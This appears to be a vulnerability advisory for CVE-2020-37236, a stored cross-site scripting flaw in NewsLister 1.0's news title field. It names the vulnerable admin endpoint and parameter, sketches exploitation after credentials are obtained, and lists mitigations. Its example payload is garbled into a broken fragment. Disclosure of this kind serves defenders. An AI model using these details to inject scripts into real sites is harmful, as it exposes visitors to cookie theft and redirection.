CVE-2020-37236

Vulnerability

NewsLister versions up to and including 1.0 contain an authenticated persistent cross-site scripting (XSS) vulnerability in the news addition interface. The title parameter in /admin/index.php?page=add is not properly sanitized, allowing administrators to inject arbitrary JavaScript [1][2].

Exploitation

An attacker must first obtain valid administrator credentials (e.g., via phishing or brute force). After logging into the admin panel, they navigate to the news addition page and supply a malicious payload (e.g., `) in the title` field. When any other user (including lower-privileged users) views that news item, the injected script executes in their browser [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session cookie theft, defacement, or redirection to malicious sites. The attack is persistent, meaning the payload remains active for all subsequent viewers until the malicious news item is removed [2].

Mitigation

No official patch or updated version has been released by the vendor. Users should restrict admin panel access to trusted users only and consider using web application firewalls (WAFs) to filter XSS payloads. If possible, disable the news addition functionality or remove the application entirely [1][2].